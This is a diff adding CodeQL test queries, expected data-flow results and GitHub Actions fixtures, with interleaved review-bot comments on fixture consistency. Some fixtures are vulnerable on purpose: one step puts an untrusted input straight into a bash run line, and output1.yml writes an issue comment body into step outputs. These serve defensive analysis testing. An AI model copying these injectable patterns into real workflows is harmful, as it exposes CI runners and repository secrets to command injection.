output.resultArray | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zentered/issue-forms-body-parser | * | input.body | output.data | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE=$(ls \| grep -E "*.(tar.gz\|zip)$") | +isBashParameterExpansion +| parameter1 | | | +| parameter2 | | | +| parameter3 | ! | | +| parameter4 | # | | +| parameter5 | :- | value | +| parameter6 | : | =value | +| parameter7 | :+ | value | +| parameter8 | : | ?value | +| parameter9 | : | =default value | +| parameter10 | ## | */ | +| parameter11 | /# | pattern/string | +| parameter12 | /% | pattern/string | +| parameter13 | , | pattern | +| parameter14 | ,, | pattern | +| parameter15 | ^ | pattern | +| parameter16 | ^^ | pattern | +| parameter17 | : | start | +| parameter18 | # | pattern | +| parameter19 | ## | pattern | +| parameter20 | % | pattern | +| parameter21 | %% | pattern | +| parameter22 | / | pattern/string | +| parameter23 | // | pattern/string | diff --git a/actions/ql/test/library-tests/test.ql b/actions/ql/test/library-tests/test.ql new file mode 100644 index 000000000000..e4c1d9e443d0 --- /dev/null +++ b/actions/ql/test/library-tests/test.ql 
@@ -0,0 +1,100 @@
+import codeql.actions.Ast
+import codeql.actions.Helper
+import codeql.actions.Cfg as Cfg
+import codeql.actions.DataFlow
+import codeql.Locations
+import codeql.actions.dataflow.ExternalFlow
+
+query predicate files(File f) { any() }
+
+query predicate workflows(Workflow w) { any() }
+
+query predicate reusableWorkflows(ReusableWorkflow w) { any() }
+
+query predicate compositeActions(CompositeAction w) { any() }
+
+query predicate jobs(Job s) { any() }
+
+query predicate localJobs(LocalJob s) { any() }
+
+query predicate extJobs(ExternalJob s) { any() }
+
+query predicate steps(Step s) { any() }
+
+query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() }
+
+query predicate uses(Uses s) { any() }
+
+query predicate stepUses(UsesStep s) { any() }
+
+query predicate usesArgs(Uses call, string argname, Expression arg) {
+ call.getArgumentExpr(argname) = arg
+}
+
+query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run }
+
+query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent }
+
+query predicate cfgNodes(Cfg::Node n) { any() }
+
+query predicate dfNodes(DataFlow::Node e) { any() }
+
+query predicate argumentNodes(DataFlow::ArgumentNode e) { any() }
+
+query predicate usesIds(UsesStep s, string a) { s.getId() = a }
+
+query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l }
+
+query predicate scopes(Cfg::CfgScope c) { any() }
+
+query predicate sources(string action, string version, string output, string kind, string provenance) {
+ actionsSourceModel(action, version, output, kind, provenance)
+}
+
+query predicate summaries(
+ string action, string version, string input, string output, string kind, string provenance
+) {
+ actionsSummaryModel(action, version, input, output, kind, provenance)
+}
+
+query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression }
+
+query string testNormalizeExpr(string s) {
+ s =
+ [
+ "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]",
+ "github.event.pull_request['user']['login']", "foo['bar'] == baz"
+ ] and
+ result = normalizeExpr(s)
+}
+
+query predicate writeToGitHubEnv1(string content) {
+ exists(string t |
+ t =
+ [
+ "FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR"
+ //"FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR",
+ //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR",
+ ] and
+ //linesFileWrite(t, _, "$GITHUB_ENV", content, _)
+ Bash::blockFileWrite(t, _, "$GITHUB_ENV", content, _)
+ //extractFileWrite(t, "GITHUB_ENV", content)
+ )
+}
+
+query predicate isBashParameterExpansion(string parameter, string operator, string params) {
+ exists(string test |
+ test =
+ [
+ "$parameter1", "${parameter2}", "${!parameter3}", "${#parameter4}", "${parameter5:-value}",
+ "${parameter6:=value}", "${parameter7:+value}", "${parameter8:?value}",
+ "${parameter9:=default value}", "${parameter10##*/}", "${parameter11/#pattern/string}",
+ "${parameter12/%pattern/string}", "${parameter13,pattern}", "${parameter14,,pattern}",
+ "${parameter15^pattern}", "${parameter16^^pattern}", "${parameter17:start}",
+ "${parameter18#pattern}", "${parameter19##pattern}", "${parameter20%pattern}",
+ "${parameter21%%pattern}", "${parameter22/pattern/string}",
+ "${parameter23//pattern/string}",
+ ] and
+ Bash::isParameterExpansion(test, parameter, operator, params)
+ )
+}
diff --git a/actions/ql/test/library-tests/workflowenum.expected b/actions/ql/test/library-tests/workflowenum.expected
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/actions/ql/test/library-tests/workflowenum.ql b/actions/ql/test/library-tests/workflowenum.ql
new file mode 100644
index 000000000000..3e0fe866ad3e
--- /dev/null
+++ b/actions/ql/test/library-tests/workflowenum.ql
@@ -0,0 +1,7 @@
+import actions
+import codeql.actions.config.ConfigExtensions as Extensions
+
+from
+ string path, string trigger, string job, string secrets_source, string permissions, string runner
+where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner)
+select trigger, path, job, secrets_source, permissions, runner
diff --git a/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml
new file mode 100644
index 000000000000..cc3f3c2863cb
--- /dev/null
+++ b/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml
@@ -0,0 +1,15 @@
+on: [push]
+
+jobs:
+ hello_world_job:
+ runs-on: ubuntu-latest
+ name: A job to say hello
+ steps:
+ - uses: actions/checkout@v4
+ - id: foo
+ uses: some-org/test-action@v1
+ with:
+ who-to-greet: ${{ github.event.pull_request.head.ref }}
+ - run: echo ${{ steps.foo.outputs.reflected}}
+ - run: echo ${{ steps.foo.outputs.tainted}}
+
diff --git a/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml
new file mode 100644
index 000000000000..239ea7ab3878
--- /dev/null
+++ b/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml
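Review bot: workflowenum.expected is committed as the empty blob (index `e69de29bb2d1`), so this query currently asserts that `Extensions::workflowDataModel` yields no rows for the library-tests fixtures, and nothing in the query says whether that is the intent or a placeholder. A one-line QLDoc above `from`, e.g. `/** Enumerates workflowDataModel rows; expected to be empty until a workflow data-model extension is added to this test. */`, would spare the next reader the lookup. The `select` also orders `trigger` before `path` while `from` declares `path` first; `select path, trigger, job, secrets_source, permissions, runner` keeps the two in step.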
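Review bot: calling_composite.yml triggers on `on: [push]` but passes `${{ github.event.pull_request.head.ref }}` as `who-to-greet`; on a push event the `pull_request` payload is absent, so that expression evaluates to an empty string at run time. If the source model is keyed on the context path alone this is harmless, but if it is gated on the triggering event the fixture would not exercise the source at all, so `on: [pull_request_target]` (or whichever event the model expects) makes the fixture self-consistent. calling_workflow.yml has the same pairing, `workflow_dispatch:` with `github.event.pull_request.head.ref` in every `config-path:`.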
@@ -0,0 +1,47 @@
+name: Call a reusable workflow and use its outputs
+
+on:
+ workflow_dispatch:
+
+jobs:
+ call1:
+ uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89
+ with:
+ config-path: ${{ github.event.pull_request.head.ref }}
+ call2:
+ uses: ./.github/workflows/reusable_workflow.yml
+ with:
+ config-path: ${{ github.event.pull_request.head.ref }}
+ call3:
+ uses: octo-org/summary-repo/.github/workflows/workflow.yml@v1
+ with:
+ config-path: ${{ github.event.pull_request.head.ref }}
+ call4:
+ uses: octo-org/source-repo/.github/workflows/workflow.yml@v1
+ call5:
+ uses: octo-org/sink-repo/.github/workflows/workflow.yml@v1
+ with:
+ config-path: ${{ github.event.pull_request.head.ref }}
+
+ job1:
+ runs-on: ubuntu-latest
+ needs: call1
+ steps:
+ - run: echo ${{ needs.call1.outputs.workflow-output }}
+ job2:
+ runs-on: ubuntu-latest
+ needs: call2
+ steps:
+ - run: echo ${{ needs.call2.outputs.workflow-output1 }}
+ - run: echo ${{ needs.call2.outputs.workflow-output2 }}
+ job3:
+ runs-on: ubuntu-latest
+ needs: call3
+ steps:
+ - run: echo ${{ needs.call3.outputs.workflow-output }}
+ job4:
+ runs-on: ubuntu-latest
+ needs: call4
+ steps:
+ - run: echo ${{ needs.call4.outputs.workflow-output }}
+
diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml
new file mode 100644
index 000000000000..c2e9e17160d3
--- /dev/null
+++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml
@@ -0,0 +1,34 @@
+name: Reusable workflow example
+
+on:
+ workflow_call:
+ inputs:
+ config-path:
+ required: true
+ type: string
+ outputs:
+ workflow-output1:
+ value: ${{ jobs.job1.outputs.job-output1 }}
+ workflow-output2:
+ value: ${{ jobs.job1.outputs.job-output2 }}
+ secrets:
+ token:
+ required: true
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+ outputs:
+ job-output1: ${{ steps.step1.outputs.step-output}}
+ job-output2: ${{ steps.step2.outputs.all_changed_files}}
+ steps:
+ - id: step1
+ env:
+ CONFIG_PATH: ${{ inputs.config-path }}
+ run: |
+ echo ${{ inputs.config-path }}
+ echo "::set-output name=step-output::$CONFIG_PATH"
+ - name: Get changed files
+ id: step2
+ uses: tj-actions/changed-files@v40
+
diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected
new file mode 100644
index 000000000000..0a5bfe433e91
--- /dev/null
+++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected
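Review bot: the `workflow_call` block declares `secrets: token: required: true`, but none of the callers in calling_workflow.yml pass a `secrets:` map, so Actions would reject each call for the missing required secret before any job runs. If the data-flow tests only exercise `inputs`/`outputs`, delete the three `secrets:` lines; otherwise give each caller `secrets: inherit` or an explicit `token:` entry so the two fixtures agree. `step1` also writes its output with the deprecated `::set-output` workflow command, presumably on purpose so that parsing of that form stays covered; a comment `# deprecated ::set-output form kept deliberately` above the line would stop a future cleanup from removing that coverage.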
@@ -0,0 +1,15 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +subpaths +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref new file mode 100644 index 000000000000..e5cb225ed249 --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -0,0 +1 @@ +Models/CompositeActionsSinks.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected new file mode 100644 index 000000000000..3be74bb8bf12 --- /dev/null 
+++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected 
@@ -0,0 +1,21 @@ +edges +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | +nodes +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | 
steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref new file mode 100644 index 000000000000..3b833d669125 --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -0,0 +1,2 @@ +Models/CompositeActionsSources.ql + diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected new file mode 100644 index 000000000000..067edb68bb1c --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected 
@@ -0,0 +1,12 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref new file mode 100644 index 000000000000..ea9b7a304e6b --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -0,0 +1,2 @@ +Models/CompositeActionsSummaries.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected new file mode 100644 index 000000000000..18e9f0186dfd --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected 
@@ -0,0 +1,24 @@ +edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | +nodes +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | semmle.label | Job: call2 [workflow-output1] | +| .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | semmle.label | needs.call2.outputs.workflow-output1 | +| 
.github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | semmle.label | output Job outputs node [workflow-output1] | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | +subpaths +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref new file mode 100644 index 000000000000..fa8344d4bf91 --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -0,0 +1,2 @@ +Models/ReusableWorkflowsSinks.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected new file mode 100644 index 000000000000..c76034f74d46 --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected 
@@ -0,0 +1,12 @@ +edges +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | +nodes +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | +subpaths +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref new file mode 100644 index 000000000000..fe4299bdba49 --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -0,0 +1,2 @@ +Models/ReusableWorkflowsSources.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected new file mode 100644 index 000000000000..8589d82d8259 --- /dev/null 
+++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected 
@@ -0,0 +1,16 @@ +edges +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | +nodes +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | +subpaths +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | 
diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref
new file mode 100644
index 000000000000..3547c8a4d07d
--- /dev/null
+++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref
@@ -0,0 +1,2 @@
+Models/ReusableWorkflowsSummaries.ql
+
diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml
new file mode 100644
index 000000000000..787fb9f588be
--- /dev/null
+++ b/actions/ql/test/query-tests/Models/action1/action.yml
@@ -0,0 +1,51 @@
+name: 'Hello World'
+description: 'Greet someone'
+inputs:
+ who-to-greet: # id of input
+ description: 'Who to greet'
+ required: true
+ default: 'World'
+outputs:
+ reflected:
+ description: "Reflected input"
+ value: ${{ steps.reflector.outputs.reflected }}
+ tainted:
+ description: "Reflected input"
+ value: ${{ steps.source.outputs.tainted}}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Secure Set Greeting
+ run: echo "Hello $INPUT_WHO_TO_GREET."
+ shell: bash
+ env:
+ INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }}
+ - name: Remove foo
+ id: replace
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ inputs.who-to-greet }}
+ find: 'foo'
+ replace: ''
+ - id: sink
+ run: echo ${{ steps.replace.outputs.value }}
+ shell: bash
+ - name: Vulnerable Set Greeting
+ run: echo "Hello ${{ inputs.who-to-greet }}."
+ shell: bash
+ - id: reflector
+ run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT
+ shell: bash
+ env:
+ INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }}
+ - id: changed-files
+ uses: tj-actions/changed-files@v40
+ - id: source
+ run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT
+ shell: bash
+ env:
+ TAINTED: ${{ steps.changed-files.outputs.all_changed_files }}
+
+
+
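Review bot: the `tainted` output reuses the `reflected` output's `description: "Reflected input"`, but its value comes from `steps.source.outputs.tainted`, which the `source` step fills from `steps.changed-files.outputs.all_changed_files` rather than from any input; `description: "Value derived from a third-party step output"` says what it actually is. The expected files label these nodes by step id ("Run Step: reflector [reflected]", "Run Step: source [tainted]"), so an accurate description is the only place the fixture explains the difference between the two outputs to someone reading the `.expected` diffs.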
diff --git a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml b/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml deleted file mode 100644 index 9392b81c6ab2..000000000000 --- a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml +++ /dev/null @@ -1,23 +0,0 @@ -on: push - -jobs: - job1: - runs-on: ubuntu-latest - steps: - - shell: pwsh - run: Write-Output "foo" - job2: - runs-on: ubuntu-latest - steps: - - run: echo "foo" - - job3: - runs-on: windows-latest - steps: - - shell: bash - run: echo "foo" - job4: - runs-on: windows-latest - steps: - - run: Write-Output "foo" - diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.expected b/actions/ql/test/query-tests/Placeholder/Placeholder.expected deleted file mode 100644 index 82fd180be661..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.expected +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | Analyzed a file. | diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref b/actions/ql/test/query-tests/Placeholder/Placeholder.qlref deleted file mode 100644 index 2ad15e688e23..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref +++ /dev/null @@ -1 +0,0 @@ -Placeholder.ql diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml new file mode 100644 index 000000000000..01036f711481 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml 
@@ -0,0 +1,39 @@
+on:
+ issue_comment:
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - id: clob1
+ env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ # VULNERABLE
+ echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT
+ echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT
+ - id: clob2
+ run: |
+ echo ${{ steps.clob1.outputs.OUTPUT_1 }}
+ echo ${{ steps.clob1.outputs.OUTPUT_2 }}
+ test2:
+ runs-on: ubuntu-latest
+ steps:
+ - id: clob1
+ env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ # NOT VULNERABLE
+ echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT
+ test3:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Download artifact
+ uses: dawidd6/action-download-artifact@v6
+ with:
+ run_id: ${{ github.event.workflow_run.id }}
